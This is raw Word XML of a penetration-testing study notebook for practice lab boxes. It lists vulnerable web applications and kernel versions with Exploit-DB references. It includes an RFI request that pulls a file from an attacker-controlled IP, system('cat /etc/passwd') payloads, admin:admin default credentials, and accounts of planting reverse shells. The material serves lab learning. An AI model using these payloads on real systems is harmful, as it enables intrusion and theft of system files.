    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A22">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  # &lt;pre&gt;system('cat /etc/passwd')&lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.187.78/wordpress//wp-admin/admin-post.php?swp_debug=load_options&amp;swp_url=http://192.168.45.208:80/test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also chain multiple commands like this to run one after the other:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;pre&gt; system('cd /home/; find . ') &lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A26">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see Linux 4.4.0–31-generic, then look at </w:t>
      </w:r>
      <w:hyperlink r:id="rId1303">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Loly</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play which got root using this </w:t>
      </w:r>
      <w:hyperlink r:id="rId1304">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (exploit DB ID 45010)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A28">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever run into a box using Adminer, an open-source database management website, then you can look at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1305">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Tre</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play Walkthrough since it enumerates through that</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A2A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I was reading an </w:t>
      </w:r>
      <w:hyperlink r:id="rId1306">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">article</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> about XXXXXXXXX studying and they randomly used CodeIgniter CMS version 4.2.0 as an example, which had a SQLi injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A2C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RecordedTV.library-ms (as seen in the SMB of Relia Challenge Lab) seems standard and useless</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A2E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RiteCMS Version 3 was exploited in the Relia Challenge Lab for 192.168.xxx.249 to get foothold into machine but only after we got into admin page by guessing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials. Easy Rite CMS exploit</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1307">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50616</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A31">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="578"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CS-Cart 1.3.3 (CS Cart) was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1308">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PayDay</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice which get them rev shell foothold. Apparently, the exploitDB didn't explain it will but </w:t>
      </w:r>
      <w:hyperlink r:id="rId1309">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> github did</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="578"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1310">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup found an LFI exploit from CS-cart too, but rev shell is better</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A34">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1042"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple PHP Photo Gallery v0.8 was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1311">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Snookums</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1042"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It has both an RFI exploit (where you can upload reverse shell) and an automated exploit (that gives you shell), both of which are mentioned in the writeup. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hetemit PG Practice was a really hard box</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it was about API and python and like SHA512 encryption for foothold. And then for priv esc, they had /sbin/reboot and a /etc/systemd/system/pythonapp.service file that they injected a bash reverse shell into</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A39">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zenphoto 1.4.1.4 (CMS) was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1312">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zenphoto</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. The crazy part is that you don't need to be authenticated, and you get a reverse shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A3B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RDS (CVE-2010–3904) is a Linux Kernel exploit for Linux Kernel 2.6.36-rc8. This was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1313">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zenphoto</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="183"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LinPEAS also caught it but it was way down in the list of exploits, so probably best to manually enumerate kernel version and google it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A3E">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eXtPlorer was a website seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1314">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">extplorer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A40">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="183"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1315">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup, they showed how to find the root directory of the website (so we know where to upload rev shells) and then they taught us how to upload reverse and web shells. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="183"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1316">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup, they also showed the above, but also taught us how to enumerate files on the machine using extplorer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A42">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The website </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RestAP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1317">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Walla</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice after we logged in as admin. We looked at the system page which showed a console page that allowed direct command execution on the server. And then from there, we just checked for python, and then set a python rev shell back to ourselves</w:t>
      </w:r>
    </w:p>
